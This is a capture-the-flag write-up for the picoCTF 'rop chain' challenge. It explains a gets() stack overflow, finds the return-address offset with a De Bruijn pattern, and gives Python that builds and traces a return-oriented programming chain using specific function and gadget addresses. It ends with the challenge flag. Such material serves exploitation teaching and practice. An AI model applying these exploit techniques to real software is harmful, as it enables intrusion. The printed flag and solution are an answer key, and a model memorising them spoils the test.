
rop chain

Points: 350

Category

Binary Exploitation

Question

Can you exploit the following program and get the flag? You can find the program in /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d on the shell server? Source.

Hint

Try and call the functions in the correct order!

Remember, you can always call main() again!

Solution

First we analyse the steps required to get the flag. It looks like we have to reach the flag function to get the flag, but a few criteria must be met first: win1, win2 and arg_check2 must hold the correct values before the flag is printed. win_function1 and win_function2 are the functions that let us set these values.

The vuln function calls gets, which is known for its buffer overflow issues: it reads input with no length bound, so anything longer than the buffer overwrites the saved return address. We use a De Bruijn sequence and calculate the offset needed to reach that return address. In this case, it's 28 characters.
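To make the offset calculation concrete, here is an added Python example (not the write-up's own code) that generates the De Bruijn pattern, stands in for the crash with a constructed frame whose saved return address sits 28 bytes past the buffer, and maps the dword found in EIP back to its position in the pattern. The `simulate_crash` helper and the 28-byte distance are constructed for the example; with the real binary the EIP value would come from the debugger.

```python
"""Generate a De Bruijn pattern and recover the overflow offset from the
dword that ended up in EIP (added example; not the write-up's own code)."""
import functools
import string
import struct


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Standard De Bruijn sequence B(k, n): every n-character window is
    unique, so the bytes that overwrite EIP identify their own position."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def pattern(length, n=4):
    """First `length` bytes of the cyclic pattern, as sent to gets()."""
    return de_bruijn(n=n)[:length].encode()


def find_offset(eip_value, n=4):
    """Map the crashed EIP (an integer, as a debugger reports it) back to
    the offset of its bytes in the pattern. Returns -1 if the dword is not
    part of the pattern at all (for example EIP was not overwritten)."""
    needle = struct.pack("<I", eip_value).decode(errors="replace")
    return de_bruijn(n=n).find(needle)


def simulate_crash(payload, buffer_to_ret=28):
    """Constructed stand-in for running the vulnerable binary: gets() copies
    `payload` over a frame whose saved return address lies `buffer_to_ret`
    bytes past the buffer start, and `ret` then loads that dword into EIP."""
    return struct.unpack("<I", payload[buffer_to_ret:buffer_to_ret + 4])[0]


if __name__ == "__main__":
    eip = simulate_crash(pattern(64))
    print("EIP = 0x%08x, offset = %d" % (eip, find_offset(eip)))
```

The offset is found by searching for the little-endian bytes of the EIP value rather than the hex digits as printed, which is the usual mistake when doing this by hand on a 32-bit target.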

Now, we get the addresses of both win functions and the flag function.

[0x080484d0]> s @ sym.win_function1
0x80485cb
[0x080484d0]> s @ sym.win_function2
0x80485d8
[0x080484d0]> s @ sym.flag
0x804862b

Since win_function2 and flag both require arguments, we need a ROP gadget that pops and returns. Each function in the chain is entered by a ret, so on entry the stack holds the next chain entry where the return address would be and the argument right after it. When the function returns into the pop; ret gadget, the pop moves the stack pointer past that argument, and the ret then jumps to the next function address we have written into the chain.

To get such a gadget, we can use radare2.

[0x080484d0]> /R pop; ret;
...
...
0x08048804               c408  les ecx, [eax]
0x08048806                 5b  pop ebx
0x08048807                 c3  ret

We can select 0x08048806 as our gadget address. It does not matter which register the value from the stack is popped into; all we need is for the stack pointer to move past the argument.

Now we just chain the addresses and get the flag:

exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2
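As an added example (not the write-up's solve.py), the following Python assembles the chain in exactly the order given above from the addresses radare2 printed, and then walks the i386 ret sequence word by word, recording which dword each function sees as its first argument. ARG_CHECK1 and ARG_CHECK2 are placeholders, since the write-up does not print the constants the challenge source compares against. Building the same chain without the pop; ret gadget shows why it is needed: win_function2 would read the flag address as its argument and then return into the argument dword.

```python
"""Assemble the rop-chain payload described above and walk it word by word
to confirm which argument each function sees (added example; not the
write-up's solve.py)."""
import struct

# Values from the write-up (radare2 output and De Bruijn offset).
OFFSET = 28
WIN_FUNCTION1 = 0x080485cb
WIN_FUNCTION2 = 0x080485d8
FLAG = 0x0804862b
POP_RET = 0x08048806  # pop ebx; ret

# Placeholders: the write-up does not print the constants that
# win_function2 and flag compare their argument against; they come
# from the challenge source.
ARG_CHECK1 = 0x11111111
ARG_CHECK2 = 0x22222222

# Name and argument count of each function the chain enters (cdecl).
FUNCTIONS = {
    WIN_FUNCTION1: ("win_function1", 0),
    WIN_FUNCTION2: ("win_function2", 1),
    FLAG: ("flag", 1),
}


def p32(value):
    """Pack a 32-bit little-endian dword, as the i386 stack expects it."""
    return struct.pack("<I", value)


def build_chain(arg_check1=ARG_CHECK1, arg_check2=ARG_CHECK2, with_gadget=True):
    """padding + win1 + win2 + pop_ret + arg_check1 + flag + pop_ret + arg_check2.
    with_gadget=False leaves the gadgets out to show why they are needed."""
    words = [WIN_FUNCTION1, WIN_FUNCTION2]
    if with_gadget:
        words += [POP_RET, arg_check1, FLAG, POP_RET, arg_check2]
    else:
        words += [arg_check1, FLAG, arg_check2]
    return b"A" * OFFSET + b"".join(p32(w) for w in words)


def trace_chain(payload, offset=OFFSET):
    """Simulate the i386 ret sequence once vuln() returns into the chain.

    esp starts at payload[offset]. On entry to a cdecl function, [esp] is
    its return address and [esp+4] its first argument. Returns a list of
    (function name, argument) pairs; a ret into an address that is neither
    a known function nor the gadget is recorded as a crash.
    """
    words = [w for (w,) in struct.iter_unpack("<I", payload[offset:])]
    calls = []
    esp = 0
    while esp < len(words):
        eip = words[esp]
        esp += 1  # ret consumed one dword
        if eip == POP_RET:
            esp += 1  # pop ebx discards the argument dword; ret follows
            continue
        if eip in FUNCTIONS:
            name, argc = FUNCTIONS[eip]
            arg = words[esp + 1] if argc and esp + 1 < len(words) else None
            calls.append((name, arg))
            continue  # the function's own ret consumes words[esp] next
        calls.append(("<crash>", eip))
        break
    return calls


if __name__ == "__main__":
    for with_gadget in (True, False):
        print("with gadget" if with_gadget else "without gadget")
        for name, arg in trace_chain(build_chain(with_gadget=with_gadget)):
            print("  %-14s %s" % (name, "" if arg is None else "0x%08x" % arg))
```

The trace is the useful part: it reproduces on paper what a debugger would show you, and makes it obvious that the second pop; ret after flag only matters if flag ever returns.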

Working solution: solve.py

Recommended reads: http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-7

Flag

picoCTF{rOp_aInT_5o_h4Rd_R1gHt_536d67d1}